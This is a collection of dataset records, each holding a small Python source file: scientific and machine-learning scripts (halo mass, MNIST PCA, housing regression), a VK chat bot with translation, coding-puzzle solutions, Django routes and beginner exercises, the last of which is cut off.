+{"seq_id":"473488836","text":"from core.emotion.emotion3 import emojis, get_emotion, emotion_validation\nfrom core.emotion.emotion2 import get_mfcc, dtw, distance, match\nfrom core.emotion.emotion1 import *\nimport numpy\nimport cv2\nimport PIL\nimport os\n\ndef detect_emotion(emotion, debug=False):\n emoji_path=''\n print('parameter: {0}'.format(emotion))\n emotion = emotion.lower()\n if(emotion==\"happy\"):\n emoji_path = emojis.happy\n pic_name = get_emotion(emoji_path, debug, 10)\n elif(emotion==\"surprise\"):\n emoji_path = emojis.surprise\n pic_name = get_emotion(emoji_path, debug, 100)\n elif(emotion==\"angry\"):\n emotion = \"angry\"\n elif(emotion==\"disgust\"):\n emotion = \"disgust\"\n elif (emotion == \"sad\"):\n emotion = \"sad\"\n elif (emotion == \"fear\"):\n emotion = \"fear\"\n elif (emotion == \"weak sad\"):\n emotion = \"weak sad\"\n elif (emotion == \"mid sad\"):\n emotion = \"mid sad\"\n elif (emotion == \"very 
sad\"):\n emotion = \"very sad\"\n elif (emotion == \"weak fear\"):\n emotion = \"weak fear\"\n elif (emotion == \"mid fear\"):\n emotion = \"mid fear\"\n elif (emotion == \"very fear\"):\n emotion = \"very fear\"\n else:\n emotion = \"other\"\n emoji_path = emojis.other\n pic_name = get_emotion(emoji_path, debug, 100)\n \n return emotion, emoji_path\n\ndef process_speech(voice_path):\n emotion_result = []\n\n #Add group 1 method here to get a return result with proper array\n emotion_result.append(\"Other\")\n\n #Add group 2 method here to get a return result with proper array\n # emotion_result.append(\"Other\")\n emotion_result.append(match(voice_path))\n\n #group 3 result\n emotion_result.append(emotion_validation(voice_path))\n #emotion_result.append(\"happy\")\n return emotion_result\n\n","sub_path":"ai_engine/workflow/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366669889","text":"# 10 May 2017 13:27:48\n\nimport matplotlib.pyplot as plt\nfrom prob2d import get_prob2d\nfrom read_mock import read_mock\nimport numpy as np\n\n\ndef show_halomass_distribution():\n p2d_arr, lnMs_arr, lnMh_arr = get_prob2d(sigma_lnMs=0.49730, hmfdata=\"../data/hmf.dat\")\n # Integrate over p(lnMs, lnMh) to get p(lnMs)\n p_lnMs_arr = np.trapz(p2d_arr, x=lnMh_arr, axis=-1)\n # Derive p(lnMh|lnMs) = p(lnMh,lnMs) / p(lnMs)\n p_lnMh_at_lnMs = np.zeros(p2d_arr.shape)\n # Divide p2d_arr by p_lnMs_arr at fixed Ms\n for i in xrange(lnMs_arr.size):\n lgMs = lnMs_arr[i] / np.log(10.0)\n p_lnMh_at_lnMs[i, :] = p2d_arr[i, :] / p_lnMs_arr[i]\n # check normalization\n # print np.trapz(p_lnMh_at_lnMs[i, :], x=lnMh_arr)\n # Plot the distribution of halo mass at a few fixed stellar masses\n if np.mod(i, 15) == 0 and lgMs < 12 and lgMs > 9.5:\n plt.plot(lnMh_arr / np.log(10.0), p_lnMh_at_lnMs[i, :],\n label=r\"$\\lg\\;M_*=$\" + format(lgMs, '4.2f'))\n plt.legend(loc=1)\n plt.ylim(1e-2, 1e1)\n plt.xlim(11, 16)\n plt.ylabel(r\"$p(\\ln\\,M_h)$\")\n plt.xlabel(r\"$\\lg\\,M_h$\")\n plt.yscale('log')\n plt.show()\n\n\ndef get_halomass():\n # those are the same as in 'show_halomass_distribution', see comments above\n p2d_arr, lnMs_arr, lnMh_arr = get_prob2d(sigma_lnMs=0.49730, hmfdata=\"../data/hmf.dat\")\n p_lnMs_arr = np.trapz(p2d_arr, x=lnMh_arr, axis=-1)\n # you can use the following loop to get p_lnMh_at_lnMs\n #\n # p_lnMh_at_lnMs = np.zeros(p2d_arr.shape)\n # for i in xrange(lnMs_arr.size):\n # p_lnMh_at_lnMs[i, :] = p2d_arr[i, :] / p_lnMs_arr[i]\n #\n # or try the one-line code below (.T means 'transpose')\n p_lnMh_at_lnMs = (p2d_arr.T / p_lnMs_arr).T\n # now let's get the mean lnMh at fixed Ms\n lnMh_mean_arr = np.zeros(lnMs_arr.size)\n for i in xrange(lnMs_arr.size):\n if True:\n # check the normalization\n _norm = np.trapz(p_lnMh_at_lnMs[i, :], x=lnMh_arr)\n if np.abs(_norm - 1.0) > 1e-5:\n raise RuntimeError('normalization breaks')\n lnMh_mean_arr[i] = np.trapz(p_lnMh_at_lnMs[i, :] * lnMh_arr, x=lnMh_arr)\n # convert results to log-10 base\n lgMs_arr = lnMs_arr / np.log(10.0)\n lgMh_mean_arr = lnMh_mean_arr / np.log(10.0)\n # convert halo mass units from Msun to Msun/h to compare with the values in the mock data\n lgMh_mean_arr = lgMh_mean_arr + np.log10(0.7)\n return(lgMs_arr, lgMh_mean_arr)\n\ndef compare_halomass_with_mock(mockfile):\n # show_halomass_distribution()\n lgMs_arr, lgMh_mean_arr = get_halomass()\n plt.plot(lgMs_arr, lgMh_mean_arr, 'r-', label=\"Prediction\")\n #\n 
galrec = read_mock(mockfile)\n iscen = galrec['lg_halo_mass'] > 1\n lgmh = galrec['lg_halo_mass'][iscen]\n lgms = galrec['lg_stellar_mass'][iscen]\n lgms_bins = np.linspace(10.0, 11.5, 15)\n lgms_cens = (lgms_bins[1:] + lgms_bins[:-1]) * 0.5\n lgmh_cens = np.zeros_like(lgms_cens)\n lgmh_errs = np.zeros_like(lgms_cens)\n for i in xrange(lgms_cens.size):\n sel = (lgms >= lgms_bins[i]) & (lgms < lgms_bins[i+1])\n nsel = np.sum(sel)\n if nsel > 5:\n # update lgms_cens\n lgms_cens[i] = np.mean(lgms[sel])\n lgmh_cens[i] = np.mean(lgmh[sel])\n lgmh_errs[i] = np.std(lgmh[sel]) / np.sqrt(float(nsel))\n plt.errorbar(lgms_cens, lgmh_cens, yerr=lgmh_errs, color=\"k\", marker=\"o\", ms=5, label=\"Mock Data\")\n plt.legend(loc=2)\n plt.xlabel(r\"$M_*\\;[M_\\odot/h^2]$\")\n plt.ylabel(r\"$M_h\\;[M_\\odot/h]$\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n mockfile = '/Users/ying/Data/ihodmock/standard/iHODcatalog_bolshoi.h5'\n show_halomass_distribution()\n compare_halomass_with_mock(mockfile)\n","sub_path":"session_2/halomass.py","file_name":"halomass.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307694550","text":"# coding: utf-8\nimport future.utils\nimport six\n\nfrom modernrpc.conf import settings\n\n\ndef _generic_convert_string(v, from_type, to_type, encoding):\n \"\"\"\n Generic method to convert any argument type (string type, list, set, tuple, dict) to an equivalent,\n with string values converted to given 'to_type' (str or unicode).\n This method must be used with Python 2 interpreter only.\n\n :param v: The value to convert\n :param from_type: The original string type to convert\n :param to_type: The target string type to convert to\n :param encoding: When\n :return:\n \"\"\"\n assert future.utils.PY2, \"This function should be used with Python 2 only\"\n assert from_type != to_type\n\n if from_type == six.binary_type and isinstance(v, six.binary_type):\n return six.text_type(v, encoding)\n\n elif from_type == six.text_type and isinstance(v, six.text_type):\n return v.encode(encoding)\n\n elif isinstance(v, (list, tuple, set)):\n return type(v)([_generic_convert_string(element, from_type, to_type, encoding) for element in v])\n\n elif isinstance(v, dict):\n return {k: _generic_convert_string(v, from_type, to_type, encoding) for k, v in v.items()}\n\n return v\n\n\ndef standardize_strings(arg, strtype=settings.MODERNRPC_PY2_STR_TYPE, encoding=settings.MODERNRPC_PY2_STR_ENCODING):\n \"\"\"\n Python 2 only. Lookup given *arg* and convert its str or unicode value according to MODERNRPC_PY2_STR_TYPE and\n MODERNRPC_PY2_STR_ENCODING settings.\n \"\"\"\n assert future.utils.PY2, \"This function should be used with Python 2 only\"\n\n if not strtype:\n return arg\n\n if strtype == six.binary_type or strtype == 'str':\n # We want to convert from unicode to str\n return _generic_convert_string(arg, six.text_type, six.binary_type, encoding)\n\n elif strtype == six.text_type or strtype == 'unicode':\n # We want to convert from str to unicode\n return _generic_convert_string(arg, six.binary_type, six.text_type, encoding)\n\n raise TypeError('standardize_strings() called with an invalid strtype: \"{}\". 
Allowed values: str or unicode'\n .format(repr(strtype)))\n","sub_path":"modernrpc/compat.py","file_name":"compat.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"34302758","text":"\n\nfrom xai.brain.wordbase.nouns._eardrum import _EARDRUM\n\n#calss header\nclass _EARDRUMS(_EARDRUM, ):\n\tdef __init__(self,): \n\t\t_EARDRUM.__init__(self)\n\t\tself.name = \"EARDRUMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"eardrum\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_eardrums.py","file_name":"_eardrums.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"621489232","text":"import requests\nimport json\n\n# Make an API call and store the response\nurl = 'https://hacker-news.firebaseio.com/v0/item/23593872.json'\nr = requests.get(url)\nprint(r.status_code)\n\n# Explore the structure of the data\nfilepath = 'Data visualization\\\\data\\\\hn_article.json'\nresponse_dict = r.json()\nwith open(filepath, 'w') as f:\n json.dump(response_dict, f, indent=4)\n","sub_path":"Data visualization/Chapter 3/hn_article.py","file_name":"hn_article.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"637796379","text":"from config import *\n\nimport vk_api\nimport requests\nimport random\n\n\nvk_bot = vk_api.VkApi(token=TOKEN)\nlong_poll = vk_bot.method('messages.getLongPollServer', {'need_pts': 1, 'lp_version': 3})\nserver, key, ts = long_poll['server'], long_poll['key'], long_poll['ts']\n\nvk_bot_user = vk_api.VkApi(token=ACCOUNT_TOKEN) # wall.get for user only\n\n\nprint(\"Ready to work\")\nprint(str(long_poll))\n\nurl_trans = 'https://translate.yandex.net/api/v1.5/tr.json/translate'\n\ndef YaTrans(in_text, lang):\n trans_option = {'key':YA_KEY, 'lang':lang, 'text': in_text}\n webRequest = requests.get(url_trans, params = trans_option)\n out_text = webRequest.text\n out_text = out_text[36:(len(out_text)-3)]\n print(out_text)\n return out_text\n\t\n\ndef write_msg(user_id, text):\n vk_bot.method('messages.send', {'user_id': user_id, 'message': text, 'random_id': random.randint(0, 1000)})\n\n\ndef sprosit_zadanie(urok):\n write_msg(user_id, 'Привет, ' + (user_name[0]['first_name']) + ', что задано по ' + urok)\n\n\ndef write_msg_attach(user_id, text, att_url):\n vk_bot.method('messages.send',\n {'user_id': user_id,\n 'attachment': att_url,\n 'message': text,\n 'random_id': random.randint(0, 1000)})\n\ndef get_last_post(owner_id, count, offset, filter): # wall.get\n\tresponse = vk_bot_user.method('wall.get',\n\t\t{'owner_id': owner_id,\n\t\t'count': count,\n\t\t'offset': offset,\n\t\t'filter': filter})\n\treturn response['items'][0]['id'] # return id of post\n\t\t\t\t \n\t\t\t\t \nwhile True:\n long_poll = requests.get(\n 'https://{server}?act={act}&key={key}&ts={ts}&wait=2500'.format(server=server, act='a_check', key=key,\n ts=ts)).json()\n\n update = long_poll['updates']\n if update[0][0] == 4:\n print(update)\n user_id = update[0][3]\n user_name = vk_bot.method('users.get', {'user_ids': user_id})\n if 'Вероника' in (user_name[0]['first_name']):\n write_msg(user_id, 'Привет, ' + (user_name[0]['first_name']) + ', что задано по математике?')\n elif 'Сергей' in (user_name[0]['first_name']):\n sprosit_zadanie('физике')\n elif 'Иван' in (user_name[0]['first_name']):\n sprosit_zadanie('химии')\n\n if 
'en:' in update[0][6]:\n            na_perevod = str(update[0][6])\n            na_perevod = na_perevod[3:(len(na_perevod))]\n            perevod = YaTrans(na_perevod, 'en-ru')\n            write_msg(user_id, perevod)  # message to user\n        elif 'ru:' in update[0][6]:\n            na_perevod = str(update[0][6])\n            na_perevod = na_perevod[3:(len(na_perevod))]\n            perevod = YaTrans(na_perevod, 'ru-en')\n            write_msg(user_id, perevod)  # message to user\n        elif 'красив' in update[0][6]:  # search for 'красив'\n            group_id = -35684707  # group id always starts from minus\n            post_id = get_last_post(group_id, 1, 1, 'owner')\n            attach = 'wall' + str(group_id) + ' ' + str(post_id)  # make link to post\n            write_msg_attach(user_id, 'вот тебе красота', attach)\n        elif 'картинк' in update[0][6]:\n            write_msg_attach(user_id,\n                             'вот тебе огненная картинка',\n                             'photo-171720905_456232035')\n        elif 'Что задано' in update[0][6]:\n            write_msg(user_id,\n                      'Извини, но я не знаю, что задано')\n        else:\n            write_msg(user_id, 'Привет, ' + (user_name[0]['first_name']))  # message to user\n\n        print(str(user_name[0]['first_name']) + ' ' +\n              str(user_name[0]['last_name']) + ' has written to bot - ' +\n              str(update[0][6]))  # msg to us\n\n    ts = long_poll['ts']\n\n","sub_path":"run_bot_vk.py","file_name":"run_bot_vk.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"351068365","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mnist import MNIST\nimport time\n\n\nnp.random.seed(0)\n\n\ndef load_mnist_dataset(path=\"data/mnist_data/\"):\n    \"\"\"Loads MNIST data located at path.\n\n    MNIST data are 28x28 pixel large images of numbers.\n\n    Parameters\n    ----------\n    path : `str`\n        path to the data directory\n\n    Returns\n    -------\n    train : `torch.tensor`\n        train data normalized to 1\n    trainlabels : `torch.tensor`\n        train data labels\n    test : `torch.tensor`\n        test data normalized to 1\n    testLabels : `torch.tensor`\n        test data labels\n    \"\"\"\n    mndata = MNIST(path)\n\n    train, trainLabels = map(np.array, mndata.load_training())\n    test, testLabels = map(np.array, mndata.load_testing())\n\n    train = train/255.0\n    test = test/255.0\n\n    return train, trainLabels, test, testLabels\n\n\ndef calculate_errors(x, eigenvectors=None, transMatrix=None):\n    \"\"\"Calculates mean square error of PCA prediction.\n\n    Parameters\n    ---------\n    x: `np.array`\n        Features\n    Vk: `np.array`, optional\n        Eigenvectors\n    transMatrix: `np.array`, None\n        Transformation matrix, the dot product of eigenvectors with themselves\n        transposed.\n\n    Returns\n    -------\n    error: `float`\n        Mean square error of reconstruction.\n    \"\"\"\n    if transMatrix is None:\n        if eigenvectors is None:\n            raise AttributeError(\"Need to supply Vk!\")\n        transMatrix = np.dot(eigenvectors, eigenvectors.T)\n    return np.mean((x - np.dot(x, transMatrix))**2)\n\n\ndef plot_eigen_fraction(k, frac):\n    \"\"\"Plots eigenvalue fraction as a function of the total number of\n    eigenvectors found during decomposition.\n\n    Parameters\n    ----------\n    k: `int`\n        Number of fitted eigenvectors\n    frac: `float`\n        Fraction of eigenvalues over total eigenvalue sum.\n    \"\"\"\n    fig, ax = plt.subplots()\n    ax.plot(k, frac)\n    ax.set_xlabel(\"k\")\n    ax.set_ylabel(\"Eigenvalue fraction\")\n    ax.set_title(\"Eigenvalue fraction vs k\")\n    plt.show()\n\n\ndef plot_errors(k, train, test):\n    \"\"\"Plots test and train error as a function of the number of eigenvectors\n    used in reconstruction.\n\n    Parameters\n    ----------\n    k: `int`\n        Number of used eigenvectors\n    test: `np.array`\n        Test error\n    
train: `np.array`\n        Train error\n    \"\"\"\n    fig, ax = plt.subplots()\n    ax.plot(k, test, label=\"Test error\")\n    ax.plot(k, train, label=\"Train error\")\n    ax.set_xlabel(\"k\")\n    ax.set_ylabel(\"Mean squared reconstruction error\")\n    ax.set_title(\"MSE vs k.\")\n    ax.legend()\n    plt.show()\n\n\ndef plot_n_eigenvectors(n, eigenvectors, nXaxes=2, nYaxes=5):\n    \"\"\"Plots first n eigenvectors\n\n    Parameters\n    ----------\n    n: `int`\n        Number of vectors to plot\n    eigenvectors: `np.array`\n        Eigenvectors\n    nXaxes: `int`, optional\n        Number of figure axes in the x direction\n    nYaxes: `int`, optional\n        Number of figure axes in the y direction\n    \"\"\"\n    fig, axes = plt.subplots(nXaxes, nYaxes)\n\n    for ax, k, eigVec in zip(axes.ravel(), range(n), eigenvectors.T):\n        ax.imshow(eigVec.reshape((28, 28)))\n        ax.set_title(f\"k={k}\")\n        ax.axis(\"off\")\n\n    plt.show()\n\n\ndef plot_pca(x, y, eigenvectors, mu, digits=(2, 6, 7), ks=(5, 15, 40, 100)):\n    \"\"\"Plots the original digits and their reconstruction for different number\n    of used eigenvectors.\n\n    Parameters\n    ----------\n    x: `np.array`\n        Features\n    y: `np.array`\n        Labels\n    eigenvectors: `np.array`\n        Eigenvectors\n    mu: `np.array`\n        Fitted mu.\n    digits: `tuple`\n        Digits to plot\n    ks: `tuple`\n        Tuple of integers declaring how many eigenvectors should be used in\n        reconstruction.\n    \"\"\"\n    fig, axes = plt.subplots(len(digits), len(ks)+1)\n    if len(digits) == 1:\n        axes = np.array([axes])\n\n    idxDigits = [np.where(y==digit)[0][0] for digit in digits]\n\n    for yax, digit, idxDigit in zip(axes[:, 0], digits, idxDigits):\n        yax.imshow(x[idxDigit].reshape((28, 28)))\n        yax.set_title(f\"Original image (digit {digit})\")\n        yax.axis(\"off\")\n\n    for yax, digit, idxDigit in zip(axes[:, 1:], digits, idxDigits):\n        for xax, k in zip(yax, ks):\n            Vk = eigenvectors[:, :k]\n            reconstruction = np.dot(Vk, np.dot(Vk.T, (x-mu.T)[idxDigit])).reshape((784, 1))\n            reconstruction += mu\n            xax.imshow(reconstruction.reshape((28, 28)))\n            xax.set_title(f\"Reconstructed (k= {k})\")\n            xax.axis(\"off\")\n\n    plt.show()\n\n\ndef pca():\n    \"\"\"Performs PCA on MNIST dataset.\n\n    Calculates and prints some eigenvalues, prints the sum of all eigenvalues.\n    Plots first 16 eigenvectors.\n    Plots eigenvalue fraction.\n    Calculates the test and train errors for reconstructions up to first 100\n    eigenvectors. Plots them.\n    Reconstructs certain digits for varying number of used eigenvectors. 
Plots\n    them.\n    \"\"\"\n    train, trainLabels, test, testLabels = load_mnist_dataset()\n\n    n, d = train.shape\n    I = np.ones((n, 1))\n\n    mu = np.dot(train.T, I)/n\n    sigElem = train - np.dot(I, mu.T)\n    sigma = np.dot(sigElem.T, sigElem)/n\n\n    eigenvalues, eigenvectors = np.linalg.eigh(sigma)\n    # sort the eigenpairs together, from largest to smallest eigenvalue\n    order = np.argsort(-1 * eigenvalues)\n    eigenvalues = eigenvalues[order]\n    eigenvectors = eigenvectors[:, order]\n\n    totEigenSum = np.sum(eigenvalues)\n\n    trainErrors, testErrors, eigenRatios = [], [], []\n    eigenSum, k = 0, np.arange(100)\n    for i in k:\n        Vk = eigenvectors[:, :(i+1)]\n        transMatrix = np.dot(Vk, Vk.T)\n        trainErrors.append(calculate_errors(train, transMatrix=transMatrix))\n        testErrors.append(calculate_errors(test, transMatrix=transMatrix))\n        eigenSum += eigenvalues[i]\n        eigenRatios.append(1 - (eigenSum/totEigenSum))\n\n    for i in (1, 2, 10, 30, 50):\n        print(f\"{i}th eigenvalue: {eigenvalues[i-1]}\")\n    print(f\"Sum of eigenvalues: {totEigenSum}\")\n\n    plot_n_eigenvectors(16, eigenvectors, nXaxes=4, nYaxes=4)\n    plot_eigen_fraction(k, eigenRatios)\n    plot_errors(k, trainErrors, testErrors)\n    plot_pca(train, trainLabels, eigenvectors, mu)\n\n\nif __name__ == \"__main__\":\n    pca()\n","sub_path":"HW3/HW3_code_solutions/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"186533068","text":"with open('test.txt', 'r') as f:\n    data = f.read().splitlines()\nlist_letters = [letter for letter in data[0]]\ndef remove_letters():\n    # delete adjacent pairs of the same letter in opposite cases, stepping\n    # back one position after each removal so newly adjacent pairs react too\n    i = 0\n    while i < len(list_letters) - 1:\n        first, second = list_letters[i], list_letters[i + 1]\n        if first != second and first.lower() == second.lower():\n            del list_letters[i:i + 2]\n            i = max(i - 1, 0)\n        else:\n            i += 1\n    print(list_letters)\n    print(len(list_letters))\nremove_letters()\n","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626148268","text":"\"\"\"\nLeetcode #202 Happy Number\n\nWrite an algorithm to determine if a number is \"happy\".\n\nA happy number is a number defined by the following process: \nStarting with any positive integer, replace the number by the \nsum of the squares of its digits, and repeat the process until \nthe number equals 1 (where it will stay), or it loops endlessly \nin a cycle which does not include 1. 
Those numbers for which \nthis process ends in 1 are happy numbers.\n\nExample: \n\nInput: 19\nOutput: true\nExplanation: \n1^2 + 9^2 = 82\n8^2 + 2^2 = 68\n6^2 + 8^2 = 100\n1^2 + 0^2 + 0^2 = 1\n\nAlgorithm/DS used: Cycle detection - hash set.\n\nO(m*n) worst case time where n is the max number of digits of 'n' and 'm' is the number of computations until a cycle is detected.\n\nO(m) worst case space where 'm' is the number of computations until a cycle is detected.\n\n\"\"\"\n\n\nclass Solution:\n    def isHappy(self, n: int) -> bool:\n        if n < 0:\n            return False\n        if n == 1:\n            return True\n        seen = set()\n        while n != 1:\n            n = sum([int(c)**2 for c in str(n)])\n            if n in seen:\n                return False\n            else:\n                seen.add(n)\n        return True\n\n\ndef test_solution():\n    s = Solution()\n    print(\"Expected result from input 19 is True and the Actual result is: \" +\n          str(s.isHappy(19)))\n    assert s.isHappy(19) == True\n\n\nif __name__ == \"__main__\":\n    test_solution()\n","sub_path":"python3/happy_number.py","file_name":"happy_number.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522505898","text":"def FlyToCentauri(X,Y):\n    Fly_Dis = Y - X\n    cnt = 0  # number of moves so far\n    Jump = 1  # distance that can be covered on move cnt\n    Jump_sum = 0  # total distance moved\n\n    while Jump_sum < Fly_Dis :\n        cnt += 1\n        Jump_sum += Jump  # add the jump distance for this move count\n        if cnt % 2 == 0 :  # when cnt is a multiple of 2, \n            Jump += 1  \n    return cnt\n\n\nN = int(input())\nfor _ in range(N):\n    X, Y = map(int,input().split())\n    print(FlyToCentauri(X,Y))\n\n","sub_path":"baekjun/기본 수학1/Fly me to the Alpah Centauri/Fly me to the Alpah Centauri 참고풀이.py","file_name":"Fly me to the Alpah Centauri 참고풀이.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"337695913","text":"import module_kit\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import StratifiedShuffleSplit\r\nfrom sklearn.pipeline import FeatureUnion, Pipeline\r\nfrom sklearn.preprocessing import Imputer, LabelBinarizer, StandardScaler\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.base import BaseEstimator, TransformerMixin\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# fetch the estate data from github\r\n# module_kit.fetch_housing_data()\r\n# read csv\r\nhousing = module_kit.load_housing_data()\r\n# plot to see the big picture\r\n# housing.hist(bins=50, figsize=(20, 15))\r\n# plt.show()\r\n# stratify the sample\r\nhousing['income_cat'] = np.ceil(housing['median_income'] / 1.5)\r\nhousing['income_cat'].where(housing['income_cat'] < 5, 5.0, inplace=True) # cap the max value at 5\r\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\r\n# stratify sampling the train and test set\r\nfor train_index, test_index in split.split(housing, housing['income_cat']):\r\n    strat_train_set = housing.loc[train_index]\r\n    strat_test_set = housing.loc[test_index]\r\n# delete column income_cat\r\nfor sset in (strat_train_set, strat_test_set):\r\n    sset.drop([\"income_cat\"], axis=1, inplace=True) # focus on the inplace, no copy\r\n# backup\r\nhousing = strat_train_set.copy()\r\n# housing.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,\r\n#              s=housing['population']/100, label='population',\r\n#              c='median_house_value', cmap=plt.get_cmap('jet'), colorbar=True\r\n#              ) # alpha controls the color density of scatter dot\r\n# produce some combination features\r\n# 
housing[\"rooms_per_household\"] = housing[\"total_rooms\"]/housing[\"households\"]\r\n# housing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"]/housing[\"total_rooms\"]\r\n# housing[\"population_per_household\"] = housing[\"population\"]/housing[\"households\"]\r\n# principle component analysis, calculate the correlation coefficient\r\n# corr_matrix = housing.corr() # return Pearson's r\r\n# print(corr_matrix[\"median_house_value\"].sort_values(ascending=False)) # descending order\r\n# separate the labels from training data_set\r\nhousing = strat_train_set.drop(\"median_house_value\", axis=1)\r\nhousing_labels = strat_train_set[\"median_house_value\"].copy() # training labels\r\nhousing_num = housing.drop(\"ocean_proximity\", axis=1) # return all numerical column\r\nhousing_cat = housing[\"ocean_proximity\"]\r\n\r\n\r\n# data cleaning\r\n# transfer pandas.dataframe to np.array\r\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\r\n def __init__(self, attribute_names):\r\n self.attribute_names = attribute_names\r\n\r\n def fit(self, X, y=None):\r\n return self\r\n\r\n def transform(self, X):\r\n return X[self.attribute_names].values\r\n\r\n\r\n# fix NA\r\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\r\n\r\n\r\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\r\n def __init__(self, add_bedrooms_per_room=True): # no *args or **kargs\r\n self.add_bedrooms_per_room = add_bedrooms_per_room\r\n\r\n def fit(self, X, y=None):\r\n return self # nothing else to do\r\n\r\n def transform(self, X, y=None):\r\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\r\n population_per_household = X[:, population_ix] / X[:, household_ix]\r\n if self.add_bedrooms_per_room:\r\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\r\n return np.c_[X, rooms_per_household, population_per_household,\r\n bedrooms_per_room]\r\n else:\r\n return np.c_[X, rooms_per_household, population_per_household]\r\n\r\n\r\nnum_attribs = list(housing_num)\r\ncat_attribs = [\"ocean_proximity\"]\r\n# numerical features: fix NA, feature scaling\r\nnum_pipeline = Pipeline([\r\n ('selector', DataFrameSelector(num_attribs)),\r\n ('imputer', Imputer(strategy=\"median\")),\r\n ('attribs_adder', CombinedAttributesAdder()),\r\n ('std_scaler', StandardScaler()),\r\n])\r\n# category feature: one-hot encoder\r\ncat_pipeline = Pipeline([\r\n ('selector', DataFrameSelector(cat_attribs)),\r\n # ('label_binarizer', LabelBinarizer()),\r\n])\r\n# emerge together\r\nfull_pipeline = FeatureUnion(transformer_list=[\r\n (\"num_pipeline\", num_pipeline),\r\n (\"cat_pipeline\", cat_pipeline),\r\n])\r\nhousing_prepared = full_pipeline.fit_transform(housing)\r\n# one-hot encoder\r\nhousing_prepared = np.delete(housing_prepared, -1, 1)\r\nhousing_cat_1hot = LabelBinarizer().fit_transform(housing_cat)\r\nhousing_prepared = np.c_[housing_prepared, housing_cat_1hot]\r\n# train model\r\nlin_reg = LinearRegression()\r\nlin_reg.fit(housing_prepared, housing_labels)\r\n#test\r\nlittle_data = housing_prepared[:5]\r\nlittle_labels = housing_labels.iloc[:5]\r\nprint(\"Prediction:\\t\", lin_reg.predict(little_data))\r\nprint(\"labels:\\t\", list(little_labels))\r\nhousing_prediction = lin_reg.predict(housing_prepared)\r\nlin_mse = mean_squared_error(housing_labels, housing_prediction)\r\nprint(lin_mse)\r\n# 
plt.show()\r\n\r\n\r\n\r\n","sub_path":"linear_regression_estate/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307937546","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom .views import *\n\nurlpatterns = [\n    path('listar', listarClientes, name='listarClientes'),\n    path('cadastrar', inserir_cliente, name=\"cadastrarCliente\"),\n    path('listar/<int:id>', listar_cliente_id, name=\"listarClienteId\"),\n    path('editar/<int:id>', editar_cliente_id, name=\"editarClienteId\"),\n    path('remover/<int:id>', remover_cliente, name=\"excluirClienteId\")\n    ]","sub_path":"clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"410319236","text":"'''\nclass Book(object):\n\n    def __init__(self, name, page=100):\n        self.name = name\n        self.page = page\n\n    def reading(self, amount):\n        self.page = self.page - amount\n        return self.page\n\n\nb = Book(name='Python', page=100)\nprint(b.reading(15))\n'''\n\n\nclass Book(object):\n    def __init__(self, book_name, pages):\n        self.book_name = book_name\n        self.pages = pages\n\n    def reading(self, kilkist):\n        # a = self.pages - kilkist\n        # return a\n        return self.pages - kilkist\n\n\nb = Book('Python', 100)\nprint(b.reading(6))\nprint(b.pages)\n\n\nclass Notebook(object):\n    def __init__(self, model, ram=4):\n        self.model = model\n        self.ram = ram\n\n    def set_ram(self, kilkist):\n        self.ram += kilkist\n        return self.ram\n\n\nprint('Notebook Asus')\nn = Notebook('Asus')\nprint(n.ram)\nprint(n.set_ram(2))\n","sub_path":"OOP/classBook.py","file_name":"classBook.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378134806","text":"n = int() \nx = 1\nwhile x < (n - 2):\n    x += 2\ndef eh_primo(n):\n    if n % 2 == 0 and n != 2 and n != 3 or n % x == 0 and n != 2 and n != 3 or n == 0 or n == 1:\n        print (False)\n    else:\n        print 